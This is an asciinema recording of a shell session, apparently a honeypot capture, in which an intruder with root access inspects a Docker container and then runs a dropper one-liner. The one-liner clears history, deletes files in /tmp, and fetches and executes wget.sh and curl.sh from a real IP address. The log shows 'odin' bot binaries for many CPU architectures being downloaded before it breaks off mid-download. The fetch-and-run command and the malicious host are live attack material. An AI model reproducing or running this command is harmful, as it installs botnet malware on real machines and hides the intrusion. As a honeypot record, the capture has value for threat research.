{"version": 2, "width": 40, "height": 80, "timestamp": 1761546527, "env": {"SHELL": "/bin/bash", "TERM": "xterm"}}
[0.015827, "o", "\u001b[?2004h\u001b]0;root@6e484a70cb35: ~\u0007root@6e484a70cb35:~# "]
[51.275904, "o", "echo \"cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\" | sh\r\n\u001b[?2004l\r"]
[51.277925, "o", "overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/UST5IGRPL7OJW2MLY35FEBYXH7:/var/lib/docker/overlay2/l/YR4XWMXPLOANZ7METBEWGEMBQI:/var/lib/docker/overlay2/l/2DEOWEWU4XGOPSPNMEQWFHRFQH:/var/lib/docker/overlay2/l/I3RPUWJAHW5OVGEHNNKEUDPTVV:/var/lib/docker/overlay2/l/YFQOPSGIISXLI2SGFTTJY56VCC:/var/lib/docker/overlay2/l/K5W4GZLDCXMEW6RLSTMB5BOW3E:/var/lib/docker/overlay2/l/YKA6SL4XIF5WMBRYHGPVHVDBTO:/var/lib/docker/overlay2/l/ZJEPNKADN27IP5KC7G2JZFBALX:/var/lib/docker/overlay2/l/7ZR5TF24DQPNLAXZT5732LV2XD:/var/lib/docker/overlay2/l/LZ4DIGAKG7V4ZOYI7LAWNUSM42:/var/lib/docker/overlay2/l/PY77IXVO3K7G5SVAGFKWMSAZAD:/var/lib/docker/overlay2/l/W6VBFVGWFHF742B2PIVHMBVX7I:/var/lib/docker/overlay2/l/K3HB4NKGNOBVMTZYXZQFPJZEUN:/var/lib/docker/overlay2/l/M2SA7HOA5RQUC4DWPLSBJQO73N:/var/lib/docker/overlay2/l/VI7DWKOEBTX4I7JUC7VISEMTXY:/var/lib/docker/overlay2/l/6GNEL24S5WPVBYTXATS7APGUPX:/var/lib/docker/overlay2/l/3EYBHHW2CYRZWUPB5NJHS4BUGC:/var/lib/docker/overlay2/l/HZMDDT5BE6NCGUHGYXUJQFNIR2,upperdir=/var/lib/docker/overlay2/e88db04cafe51efaebfa705f31a4a2b6b43d9a2519a422ce47e981ff4a93c972/diff,workdir=/var/lib/docker/overlay2/e88db04cafe51efaebfa705f31a4a2b6b43d9a2519a422ce47e981ff4a93c972/work,nouserxattr 0 0\r\nproc /proc proc rw,nosuid,nodev,noexec,relatime 0 0\r\ntmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ndevpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0\r\nsysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0\r\ncgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot 0 0\r\nmqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0\r\nshm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k,inode64 0 0\r\n/dev/sda1 /tmp/.systemd-private ext4 rw,relatime 0 0\r\n/dev/sda1 /etc/resolv.conf ext4 rw,relatime 0 0\r\n/dev/sda1 /etc/hostname ext4 rw,relatime 0 0\r\n/dev/sda1 /etc/hosts ext4 rw,relatime 0 0\r\n/dev/sda1 /var/log/.journal ext4 rw,relatime 0 0\r\n/dev/sda1 /var/log/auth ext4 rw,relatime 0 0\r\nproc /proc/bus proc ro,nosuid,nodev,noexec,relatime 0 0\r\nproc /proc/fs proc ro,nosuid,nodev,noexec,relatime 0 0\r\nproc /proc/irq proc ro,nosuid,nodev,noexec,relatime 0 0\r\nproc /proc/sys proc ro,nosuid,nodev,noexec,relatime 0 0\r\nproc /proc/sysrq-trigger proc ro,nosuid,nodev,noexec,relatime 0 0\r\ntmpfs /proc/acpi tmpfs ro,relatime,inode64 0 0\r\ntmpfs /proc/interrupts tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/kcore tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/keys tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/latency_stats tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/timer_list tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0\r\ntmpfs /proc/scsi tmpfs ro,relatime,inode64 0 0\r\ntmpfs /sys/firmware tmpfs ro,relatime,inode64 0 0\r\n"]
[51.279468, "o", "arch_status\t    net\r\nattr\t\t    ns\r\nautogroup\t    numa_maps\r\nauxv\t\t    oom_adj\r\ncgroup\t\t    oom_score\r\nclear_refs\t    oom_score_adj\r\ncmdline\t\t    pagemap\r\ncomm\t\t    patch_state\r\ncoredump_filter     personality\r\ncpu_resctrl_groups  projid_map\r\ncpuset\t\t    root\r\ncwd\t\t    sched\r\nenviron\t\t    schedstat\r\nexe\t\t    sessionid\r\nfd\t\t    setgroups\r\nfdinfo\t\t    smaps\r\ngid_map\t\t    smaps_rollup\r\nio\t\t    stack\r\nksm_merging_pages   stat\r\nksm_stat\t    statm\r\nlatency\t\t    status\r\nlimits\t\t    syscall\r\nloginuid\t    task\r\nmap_files\t    timens_offsets\r\nmaps\t\t    timers\r\nmem\t\t    timerslack_ns\r\nmountinfo\t    uid_map\r\nmounts\t\t    wchan\r\nmountstats\r\n"]
[51.281376, "o", "sh: 1: curl2: not found\r\n"]
[51.283951, "o", "USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\r\n"]
[51.284036, "o", "root           1  0.0  0.0   4364  3200 ?        Ss   00:00   0:00 /bin/bash /op\r\n"]
[51.284169, "o", "syslog        13  0.0  0.0 152768  3660 ?        Ssl  00:00   0:01 rsyslogd\r\ntcpdump       15  0.0  0.0  16476  7936 ?        S    00:00   0:02 tcpdump -i an\r\n"]
[51.284203, "o", "root          16  0.0  0.1  15440  8960 ?        S    00:00   0:00 sshd: /usr/sb\r\n"]
[51.284314, "o", "root         471  0.0  0.0   4364  1192 ?        S    00:49   0:00 /bin/bash /op\r\nroot         476  0.0  0.2 101100 20620 ?        Sl   00:49   0:00 /usr/bin/pyth\r\nroot         479  0.0  0.1  27104 13896 ?        S    00:49   0:00 /usr/bin/pyth\r\n"]
[51.284475, "o", "root         480  0.0  0.1  27116 14668 ?        S    00:49   0:00 /usr/bin/pyth\r\nroot         481  0.0  0.0   2892  1536 pts/0    Ss+  00:49   0:00 sh -c cat\r\nroot         483  0.0  0.0   3308  1664 pts/0    S+   00:49   0:00 cat\r\n"]
[51.284577, "o", "root         510  0.0  0.0   4364  1316 ?        S    00:50   0:00 /bin/bash /op\r\n"]
[51.284661, "o", "root         514  0.0  0.2 101100 20748 ?        Sl   00:50   0:00 /usr/bin/pyth\r\nroot         518  0.0  0.1  27104 13892 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         519  0.0  0.1  27116 14532 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[51.284697, "o", "root         520  0.0  0.0   2892  1536 pts/1    Ss+  00:50   0:00 sh -c cat\r\n"]
[51.284827, "o", "root         522  0.0  0.0   3308  1664 pts/1    S+   00:50   0:00 cat\r\n"]
[51.284902, "o", "root         555  0.0  0.0   4364  1188 ?        S    00:50   0:00 /bin/bash /op\r\nroot         559  0.0  0.2 101100 20748 ?        Sl   00:50   0:00 /usr/bin/pyth\r\n"]
[51.285004, "o", "root         563  0.0  0.1  27104 14024 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         564  0.0  0.1  27116 14536 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         565  0.0  0.0   2892  1664 pts/2    Ss+  00:50   0:00 sh -c cat\r\n"]
[51.285131, "o", "root         567  0.0  0.0   3308  1664 pts/2    S+   00:50   0:00 cat\r\n"]
[51.285153, "o", "root         594  0.0  0.0   4364  1316 ?        S    00:50   0:00 /bin/bash /op\r\n"]
[51.285188, "o", "root         598  0.0  0.2 101100 20620 ?        Sl   00:50   0:00 /usr/bin/pyth\r\n"]
[51.285249, "o", "root         602  0.0  0.1  27104 14024 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[51.285434, "o", "root         603  0.0  0.1  27116 14664 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         604  0.0  0.0   2892  1536 pts/3    Ss+  00:50   0:00 sh -c cat\r\nroot         606  0.0  0.0   3308  1536 pts/3    S+   00:50   0:00 cat\r\nroot         633  0.0  0.0   4364  1316 ?        S    00:50   0:00 /bin/bash /op\r\n"]
[51.285497, "o", "root         638  0.0  0.2 101100 20748 ?        Sl   00:50   0:00 /usr/bin/pyth\r\n"]
[51.285567, "o", "root         643  0.0  0.1  27104 14024 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         644  0.0  0.1  27116 14664 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[51.285652, "o", "root         645  0.0  0.0   2892  1536 pts/4    Ss+  00:50   0:00 sh -c cat\r\n"]
[51.285689, "o", "root         647  0.0  0.0   3308  1536 pts/4    S+   00:50   0:00 cat\r\nroot         674  0.0  0.0   4364  1188 ?        S    00:50   0:00 /bin/bash /op"]
[51.28591, "o", "\r\nroot         679  0.0  0.2 101100 20728 ?        Sl   00:50   0:00 /usr/bin/pyth\r\n"]
[51.286026, "o", "root         684  0.0  0.1  27104 13892 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         685  0.0  0.1  27116 14532 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         686  0.0  0.0   2892  1536 pts/5    Ss+  00:50   0:00 sh -c cat\r\n"]
[51.286121, "o", "root         688  0.0  0.0   3308  1664 pts/5    S+   00:50   0:00 cat\r\nroot         719  0.0  0.0   4364  1192 ?        S    00:50   0:00 /bin/bash /op\r\nroot         722  0.0  0.2 101100 20620 ?        Sl   00:50   0:00 /usr/bin/pyth\r\n"]
[51.286205, "o", "root         727  0.0  0.1  27104 13764 ?        S    00:50   0:00 /usr/bin/pyth\r\nroot         728  0.0  0.1  27116 14532 ?        S    00:50   0:00 /usr/bin/pyth\r\n"]
[51.286262, "o", "root         729  0.0  0.0   2892  1536 pts/6    Ss+  00:50   0:00 sh -c cat\r\nroot         731  0.0  0.0   3308  1536 pts/6    S+   00:50   0:00 cat\r\nroot         758  0.0  0.0   4364  1316 ?        S    00:51   0:00 /bin/bash /op\r\n"]
[51.286284, "o", "root         762  0.0  0.2 101100 20620 ?        Sl   00:51   0:00 /usr/bin/pyth\r\n"]
[51.286384, "o", "root         766  0.0  0.1  27104 13892 ?        S    00:51   0:00 /usr/bin/pyth\r\nroot         767  0.0  0.1  27116 14660 ?        S    00:51   0:00 /usr/bin/pyth\r\n"]
[51.286458, "o", "root         768  0.0  0.0   2892  1664 pts/7    Ss+  00:51   0:00 sh -c cat\r\n"]
[51.286479, "o", "root         770  0.0  0.0   3308  1536 pts/7    S+   00:51   0:00 cat\r\n"]
[51.286536, "o", "root         799  0.0  0.0   4364  1060 ?        S    00:51   0:00 /bin/bash /op\r\n"]
[51.286672, "o", "root         804  0.0  0.2 101100 20620 ?        Sl   00:51   0:00 /usr/bin/pyth\r\nroot         809  0.0  0.1  27104 13896 ?        S    00:51   0:00 /usr/bin/pyth\r\nroot         810  0.0  0.1  27116 14664 ?        S    00:51   0:00 /usr/bin/pyth\r\nroot         811  0.0  0.0   2892  1536 pts/8    Ss+  00:51   0:00 sh -c cat\r\n"]
[51.286755, "o", "root         813  0.0  0.0   3308  1664 pts/8    S+   00:51   0:00 cat\r\nroot         921  0.0  0.0   4364  1188 ?        S    00:59   0:00 /bin/bash /op\r\n"]
[51.286862, "o", "root         925  0.0  0.2 101100 20748 ?        Sl   00:59   0:00 /usr/bin/pyth\r\nroot         929  0.0  0.1  27104 13896 ?        S    00:59   0:00 /usr/bin/pyth\r\n"]
[51.28694, "o", "root         930  0.0  0.1  27116 14536 ?        S    00:59   0:00 /usr/bin/pyth\r\n"]
[51.287056, "o", "root         931  0.0  0.0   2892  1536 pts/9    Ss+  00:59   0:00 sh -c cat\r\nroot         933  0.0  0.0   3308  1536 pts/9    S+   00:59   0:00 cat\r\nroot        1004  0.0  0.0   4364  1452 ?        S    01:13   0:00 /bin/bash /op\r\n"]
[51.287094, "o", "root        1008  0.0  0.2 101100 20600 ?        Sl   01:13   0:00 /usr/bin/pyth\r\nroot        1090  0.0  0.1  27104 14020 ?        S    01:13   0:00 /usr/bin/pyth\r\n"]
[51.287277, "o", "root        1091  0.0  0.1  27116 14660 ?        S    01:13   0:00 /usr/bin/pyth\r\nroot        1092  0.0  0.0   2892  1664 pts/10   Ss+  01:13   0:00 sh -c cat\r\nroot        1094  0.0  0.0   3308  1664 pts/10   S+   01:13   0:00 cat\r\nadmin       1177  0.0  0.0   4364  1196 ?        S    01:27   0:00 /bin/bash /op\r\n"]
[51.28737, "o", "admin       1182  0.0  0.2 101100 20520 ?        Sl   01:27   0:00 /usr/bin/pyth\r\nadmin       1263  0.0  0.1  27104 13984 ?        S    01:27   0:00 /usr/bin/pyth\r\n"]
[51.287469, "o", "admin       1264  0.0  0.1  27116 14628 ?        S    01:27   0:00 /usr/bin/pyth\r\nadmin       1265  0.0  0.0   2892  1664 pts/11   Ss+  01:27   0:00 sh -c cat\r\n"]
[51.287566, "o", "admin       1267  0.0  0.0   3308  1536 pts/11   S+   01:27   0:00 cat\r\n"]
[51.287664, "o", "user        2154  0.0  0.0   4364  1324 ?        S    04:07   0:00 /bin/bash /op\r\nuser        2158  0.0  0.2 101100 20624 ?        Sl   04:07   0:00 /usr/bin/pyth\r\n"]
[51.287694, "o", "user        2240  0.0  0.1  27104 13876 ?        S    04:07   0:00 /usr/bin/pyth\r\nuser        2241  0.0  0.1  27116 14520 ?        S    04:07   0:00 /usr/bin/pyth\r\n"]
[51.287839, "o", "user        2242  0.0  0.0   2892  1536 pts/12   Ss+  04:07   0:00 sh -c cat\r\nuser        2243  0.0  0.0   3308  1536 pts/12   S+   04:07   0:00 cat\r\nroot        2310  0.0  0.0   4364  1192 ?        S    04:16   0:00 /bin/bash /op\r\n"]
[51.287995, "o", "root        2315  0.0  0.2 101100 20492 ?        Sl   04:16   0:00 /usr/bin/pyth\r\nroot        2318  0.0  0.1  27104 13892 ?        S    04:16   0:00 /usr/bin/pyth\r\nroot        2319  0.0  0.1  27116 14660 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[51.288088, "o", "root        2320  0.0  0.0   2892  1536 pts/13   Ss+  04:16   0:00 sh -c cat\r\nroot        2322  0.0  0.0   3308  1536 pts/13   S+   04:16   0:00 cat\r\nroot        2349  0.0  0.0   4364  1316 ?        S    04:16   0:00 /bin/bash /op\r\n"]
[51.28817, "o", "root        2354  0.0  0.2 101100 20496 ?        Sl   04:16   0:00 /usr/bin/pyth\r\n"]
[51.288247, "o", "root        2357  0.0  0.1  27104 13896 ?        S    04:16   0:00 /usr/bin/pyth\r\nroot        2358  0.0  0.1  27116 14408 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[51.288377, "o", "root        2359  0.0  0.0   2892  1536 pts/14   Ss+  04:16   0:00 sh -c cat\r\nroot        2361  0.0  0.0   3308  1664 pts/14   S+   04:16   0:00 cat\r\n"]
[51.28841, "o", "root        2388  0.0  0.0   4364  1316 ?        S    04:16   0:00 /bin/bash /op\r\n"]
[51.288487, "o", "root        2392  0.0  0.2 101100 20744 ?        Sl   04:16   0:00 /usr/bin/pyth\r\nroot        2396  0.0  0.1  27104 14020 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[51.28852, "o", "root        2397  0.0  0.1  27116 14660 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[51.288607, "o", "root        2398  0.0  0.0   2892  1664 pts/15   Ss+  04:16   0:00 sh -c cat\r\nroot        2400  0.0  0.0   3308  1536 pts/15   S+   04:16   0:00 cat\r\n"]
[51.288719, "o", "root        2427  0.0  0.0   4364  1188 ?        S    04:16   0:00 /bin/bash /op\r\nroot        2431  0.0  0.2 101100 20620 ?        Sl   04:16   0:00 /usr/bin/pyth\r\n"]
[51.288767, "o", "root        2461  0.0  0.0   4364  1188 ?        S    04:16   0:00 /bin/bash /op\r\nroot        2466  0.0  0.2 101100 20620 ?        Sl   04:16   0:00 /usr/bin/pyth\r\n"]
[51.288892, "o", "root        2471  0.0  0.1  27104 13892 ?        S    04:16   0:00 /usr/bin/pyth\r\nroot        2472  0.0  0.1  27116 14532 ?        S    04:16   0:00 /usr/bin/pyth\r\nroot        2473  0.0  0.0   2892  1536 pts/16   Ss+  04:16   0:00 sh -c cat\r\n"]
[51.288995, "o", "root        2475  0.0  0.0   3308  1536 pts/16   S+   04:16   0:00 cat\r\nroot        2476  0.0  0.1  27104 14024 ?        S    04:16   0:00 /usr/bin/pyth\r\n"]
[51.289078, "o", "root        2477  0.0  0.1  27116 14664 ?        S    04:16   0:00 /usr/bin/pyth\r\nroot        2478  0.0  0.0   2892  1536 pts/17   Ss+  04:16   0:00 sh -c cat\r\n"]
[51.289151, "o", "root        2480  0.0  0.0   3308  1792 pts/17   S+   04:16   0:00 cat\r\nroot        2507  0.0  0.0   4364  1188 ?        S    04:17   0:00 /bin/bash /op\r\n"]
[51.289252, "o", "root        2512  0.0  0.2 101100 20748 ?        Sl   04:17   0:00 /usr/bin/pyth\r\nroot        2517  0.0  0.1  27104 13872 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[51.289281, "o", "root        2518  0.0  0.1  27116 14512 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[51.289368, "o", "root        2519  0.0  0.0   2892  1664 pts/18   Ss+  04:17   0:00 sh -c cat\r\n"]
[51.289394, "o", "root        2521  0.0  0.0   3308  1664 pts/18   S+   04:17   0:00 cat\r\n"]
[51.289404, "o", "root        2548  0.0  0.0   4364  1196 ?        S    04:17   0:00 /bin/bash /op\r\n"]
[51.289513, "o", "root        2551  0.0  0.2 101100 20776 ?        Sl   04:17   0:00 /usr/bin/pyth\r\n"]
[51.289605, "o", "root        2556  0.0  0.1  27104 13896 ?        S    04:17   0:00 /usr/bin/pyth\r\nroot        2557  0.0  0.1  27116 14536 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[51.289694, "o", "root        2558  0.0  0.0   2892  1536 pts/19   Ss+  04:17   0:00 sh -c cat\r\nroot        2560  0.0  0.0   3308  1664 pts/19   S+   04:17   0:00 cat\r\n"]
[51.28974, "o", "root        2587  0.0  0.0   4364  1316 ?        S    04:17   0:00 /bin/bash /op\r\n"]
[51.289849, "o", "root        2591  0.0  0.2 101100 20492 ?        Sl   04:17   0:00 /usr/bin/pyth\r\nroot        2595  0.0  0.1  27104 13976 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[51.289883, "o", "root        2596  0.0  0.1  27116 14616 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[51.289907, "o", "root        2597  0.0  0.0   2892  1664 pts/20   Ss+  04:17   0:00 sh -c cat\r\n"]
[51.290022, "o", "root        2599  0.0  0.0   3308  1536 pts/20   S+   04:17   0:00 cat\r\nroot        2626  0.0  0.0   4364  1316 ?        S    04:17   0:00 /bin/bash /op\r\n"]
[51.290131, "o", "root        2631  0.0  0.2 101100 20492 ?        Sl   04:17   0:00 /usr/bin/pyth\r\n"]
[51.290224, "o", "root        2636  0.0  0.1  27104 14024 ?        S    04:17   0:00 /usr/bin/pyth\r\nroot        2637  0.0  0.1  27116 14664 ?        S    04:17   0:00 /usr/bin/pyth\r\n"]
[51.290309, "o", "root        2638  0.0  0.0   2892  1536 pts/21   Ss+  04:17   0:00 sh -c cat\r\n"]
[51.290336, "o", "root        2640  0.0  0.0   3308  1664 pts/21   S+   04:17   0:00 cat\r\nroot        2685  0.0  0.0   4364  1452 ?        S    04:21   0:00 /bin/bash /op\r\nroot        2689  0.0  0.2 101100 20624 ?        Sl   04:21   0:00 /usr/bin/pyth\r\n"]
[51.290444, "o", "root        2771  0.0  0.1  27104 13892 ?        S    04:21   0:00 /usr/bin/pyth\r\nroot        2772  0.0  0.1  27116 14660 ?        S    04:21   0:00 /usr/bin/pyth\r\n"]
[51.290472, "o", "root        2773  0.0  0.0   2892  1664 pts/22   Ss+  04:21   0:00 sh -c cat\r\n"]
[51.290567, "o", "root        2775  0.0  0.0   3308  1664 pts/22   S+   04:21   0:00 cat\r\n"]
[51.290668, "o", "admin       2877  0.0  0.0   4364  1324 ?        S    04:34   0:00 /bin/bash /op\r\nadmin       2881  0.0  0.2 101100 20688 ?        Sl   04:34   0:00 /usr/bin/pyth\r\n"]
[51.290768, "o", "admin       2963  0.0  0.1  27104 14020 ?        S    04:34   0:00 /usr/bin/pyth\r\nadmin       2964  0.0  0.1  27116 14660 ?        S    04:34   0:00 /usr/bin/pyth\r\n"]
[51.290886, "o", "admin       2965  0.0  0.0   2892  1536 pts/23   Ss+  04:34   0:00 sh -c cat\r\nadmin       2967  0.0  0.0   3308  1536 pts/23   S+   04:34   0:00 cat\r\n"]
[51.290915, "o", "root        3485  1.1  0.1  20724 14248 ?        Ss   06:17   0:08 sshd: root\r\n"]
[51.291032, "o", "root        3543  0.0  0.0   4364  1316 ?        S    06:19   0:00 /bin/bash /op\r\nroot        3547  0.0  0.2 101100 21004 ?        Sl   06:19   0:00 /usr/bin/pyth\r\n"]
[51.291141, "o", "root        3551  0.0  0.1  27104 13892 ?        S    06:19   0:00 /usr/bin/pyth\r\n"]
[51.291216, "o", "root        3552  0.0  0.1  27116 14532 ?        S    06:19   0:00 /usr/bin/pyth\r\nroot        3553  0.0  0.0   2892  1536 pts/24   Ss+  06:19   0:00 sh -c cat\r\n"]
[51.291231, "o", "root        3555  0.0  0.0   3308  1664 pts/24   S+   06:19   0:00 cat\r\n"]
[51.291287, "o", "root        3593  0.0  0.1  16988 10676 ?        Rs   06:28   0:00 sshd: root@pt\r\n"]
[51.291316, "o", "root        3605  0.3  0.2 101088 20592 pts/25   Rsl+ 06:28   0:00 /usr/bin/pyth\r\n"]
[51.291381, "o", "root        3630  0.0  0.0      0     0 pts/25   Z+   06:28   0:00 [alert.sh] <d\r\n"]
[51.291398, "o", "root        3635  0.0  0.1  27092 14012 pts/25   S+   06:28   0:00 /usr/bin/pyth\r\n"]
[51.291483, "o", "root        3636  0.0  0.1  27104 14652 pts/25   R+   06:28   0:00 /usr/bin/pyth\r\nroot        3637  0.0  0.0   2892  1536 pts/26   Ss   06:28   0:00 sh -c /bin/ba\r\n"]
[51.291539, "o", "root        3638  0.0  0.0   5004  3840 pts/26   S    06:28   0:00 /bin/bash\r\n"]
[51.291569, "o", "root        3645  0.0  0.0   2892  1664 pts/26   S+   06:29   0:00 sh\r\n"]
[51.291617, "o", "root        3648  0.0  0.0   7440  3072 pts/26   R+   06:29   0:00 ps aux\r\n"]
[51.297434, "o", "    PID TTY          TIME CMD\r\n   3637 pts/26   00:00:00 sh\r\n"]
[51.297561, "o", "   3638 pts/26   00:00:00 bash\r\n   3645 pts/26   00:00:00 sh\r\n   3649 pts/26   00:00:00 ps\r\n"]
[51.298052, "o", "\u001b[?2004h\u001b]0;root@6e484a70cb35: ~\u0007root@6e484a70cb35:~# \r\n\u001b[?2004l\r"]
[51.298143, "o", "\u001b[?2004h\u001b]0;root@6e484a70cb35: ~\u0007root@6e484a70cb35:~# "]
[62.321963, "o", "echo \"history -cw; cd /tmp; rm -rf *.sh; rm -rf bizy*; rm -rf odin*; wget http://91.92.241.59/wget.sh; sh wget.sh; curl http://91.92.241.59/curl.sh -o curl.sh; sh curl.sh | sh\" | sh\r\n\u001b[?2004l\r"]
[62.323966, "o", "sh: 1: history: not found\r\n"]
[62.333194, "o", "--2025-10-27 06:29:50--  http://91.92.241.59/wget.sh\r\nConnecting to 91.92.241.59:80... "]
[62.543851, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[62.585056, "o", "200 OK\r\nLength: 2458 (2.4K) [application/x-shellscript]\r\nSaving to: ‘wget.sh’\r\n\r\n\rwget.sh        0%       0  --.-KB/s               "]
[62.585162, "o", "\rwget.sh      100%   2.40K  --.-KB/s    in 0s      \r\n\r\n2025-10-27 06:29:50 (244 MB/s) - ‘wget.sh’ saved [2458/2458]\r\n\r\n"]
[62.58679, "o", "wget.sh: 3: ulimit: error setting limit (Operation not permitted)\r\n"]
[62.591851, "o", "--2025-10-27 06:29:50--  http://91.92.241.59/odin.arm\r\nConnecting to 91.92.241.59:80... "]
[62.63297, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[62.674339, "o", "200 OK\r\nLength: 129568 (127K) [application/octet-stream]\r\n"]
[62.674589, "o", "Saving to: ‘odin.arm’\r\n\r\n\rodin.arm       0%       0  --.-KB/s               "]
[62.914871, "o", "\rodin.arm      22%  28.21K   117KB/s               "]
[63.015393, "o", "\rodin.arm     100% 126.53K   371KB/s    in 0.3s    \r\n\r\n2025-10-27 06:29:50 (371 KB/s) - ‘odin.arm’ saved [129568/129568]\r\n\r\n"]
[63.019221, "o", "wget.sh: 10: ./odin.arm: Exec format error\r\n"]
[63.021683, "o", "--2025-10-27 06:29:50--  http://91.92.241.59/odin.arm5\r\nConnecting to 91.92.241.59:80... "]
[63.062946, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[63.104352, "o", "200 OK\r\nLength: 125472 (123K) [application/octet-stream]\r\n"]
[63.104405, "o", "Saving to: ‘odin.arm5’\r\n"]
[63.104623, "o", "\r\n\rodin.arm5      0%       0  --.-KB/s               "]
[63.305144, "o", "\rodin.arm5     83% 102.77K   513KB/s               "]
[63.329775, "o", "\rodin.arm5    100% 122.53K   544KB/s    in 0.2s    \r\n\r\n2025-10-27 06:29:51 (544 KB/s) - ‘odin.arm5’ saved [125472/125472]\r\n\r\n"]
[63.33344, "o", "wget.sh: 11: ./odin.arm5: Exec format error\r\n"]
[63.336818, "o", "--2025-10-27 06:29:51--  http://91.92.241.59/odin.arm5n\r\n"]
[63.336937, "o", "Connecting to 91.92.241.59:80... "]
[63.378158, "o", "connected.\r\n"]
[63.37835, "o", "HTTP request sent, awaiting response... "]
[63.515636, "o", "200 OK\r\nLength: 44912 (44K) [application/octet-stream]\r\n"]
[63.515716, "o", "Saving to: ‘odin.arm5n’\r\n\r\n\rodin.arm5n     0%       0  --.-KB/s               "]
[63.599073, "o", "\rodin.arm5n   100%  43.86K  --.-KB/s    in 0.08s   \r\n\r\n2025-10-27 06:29:51 (528 KB/s) - ‘odin.arm5n’ saved [44912/44912]\r\n\r\n"]
[63.602526, "o", "wget.sh: 12: ./odin.arm5n: Exec format error\r\n"]
[63.604619, "o", "--2025-10-27 06:29:51--  http://91.92.241.59/odin.arm6\r\nConnecting to 91.92.241.59:80... "]
[63.645818, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[63.721461, "o", "200 OK\r\nLength: 141180 (138K) [application/octet-stream]\r\nSaving to: ‘odin.arm6’\r\n\r\n\rodin.arm6      0%       0  --.-KB/s               "]
[63.988101, "o", "\rodin.arm6     97% 133.94K   503KB/s               "]
[63.991451, "o", "\rodin.arm6    100% 137.87K   511KB/s    in 0.3s    \r\n\r\n2025-10-27 06:29:51 (511 KB/s) - ‘odin.arm6’ saved [141180/141180]\r\n\r\n"]
[63.995091, "o", "wget.sh: 13: ./odin.arm6: Exec format error\r\n"]
[63.998266, "o", "--2025-10-27 06:29:51--  http://91.92.241.59/odin.arm7\r\nConnecting to 91.92.241.59:80... "]
[64.040116, "o", "connected.\r\n"]
[64.040272, "o", "HTTP request sent, awaiting response... "]
[64.081973, "o", "200 OK\r\nLength: 176104 (172K) [application/octet-stream]\r\n"]
[64.082044, "o", "Saving to: ‘odin.arm7’\r\n\r\n\rodin.arm7      0%       0  --.-KB/s               "]
[64.283499, "o", "\rodin.arm7     93% 161.05K   800KB/s               "]
[64.289019, "o", "\rodin.arm7    100% 171.98K   831KB/s    in 0.2s    \r\n\r\n"]
[64.289072, "o", "2025-10-27 06:29:52 (831 KB/s) - ‘odin.arm7’ saved [176104/176104]\r\n\r\n"]
[64.292612, "o", "wget.sh: 14: ./odin.arm7: Exec format error\r\n"]
[64.295572, "o", "--2025-10-27 06:29:52--  http://91.92.241.59/odin.m68k\r\n"]
[64.295614, "o", "Connecting to 91.92.241.59:80... "]
[64.336838, "o", "connected.\r\n"]
[64.337007, "o", "HTTP request sent, awaiting response... "]
[64.59481, "o", "200 OK\r\nLength: 144512 (141K)"]
[64.594862, "o", " [application/octet-stream]\r\n"]
[64.595059, "o", "Saving to: ‘odin.m68k’\r\n"]
[64.595164, "o", "\r\n\rodin.m68k      0%       0  --.-KB/s               "]
[64.758545, "o", "\rodin.m68k    100% 141.12K   864KB/s    in 0.2s    \r\n\r\n2025-10-27 06:29:52 (864 KB/s) - ‘odin.m68k’ saved [144512/144512]\r\n\r\n"]
[64.761859, "o", "wget.sh: 15: ./odin.m68k: Exec format error\r\n"]
[64.763963, "o", "--2025-10-27 06:29:52--  http://91.92.241.59/odin.mips\r\nConnecting to 91.92.241.59:80... "]
[64.828979, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[64.870593, "o", "200 OK\r\nLength: 169356 (165K) [application/octet-stream]\r\nSaving to: ‘odin.mips’\r\n"]
[64.870808, "o", "\r\n\rodin.mips      0%       0  --.-KB/s               "]
[65.166477, "o", "\rodin.mips     94% 155.63K   526KB/s               "]
[65.169791, "o", "\rodin.mips    100% 165.39K   553KB/s    in 0.3s    \r\n\r\n2025-10-27 06:29:52 (553 KB/s) - ‘odin.mips’ saved [169356/169356]\r\n\r\n"]
[65.174141, "o", "wget.sh: 16: ./odin.mips: Exec format error\r\n"]
[65.177409, "o", "--2025-10-27 06:29:52--  http://91.92.241.59/odin.mpsl\r\nConnecting to 91.92.241.59:80... "]
[65.218721, "o", "connected.\r\nHTTP request sent, awaiting response... "]
[65.260411, "o", "200 OK\r\nLength: 169388 (165K) [application/octet-stream]\r\n"]
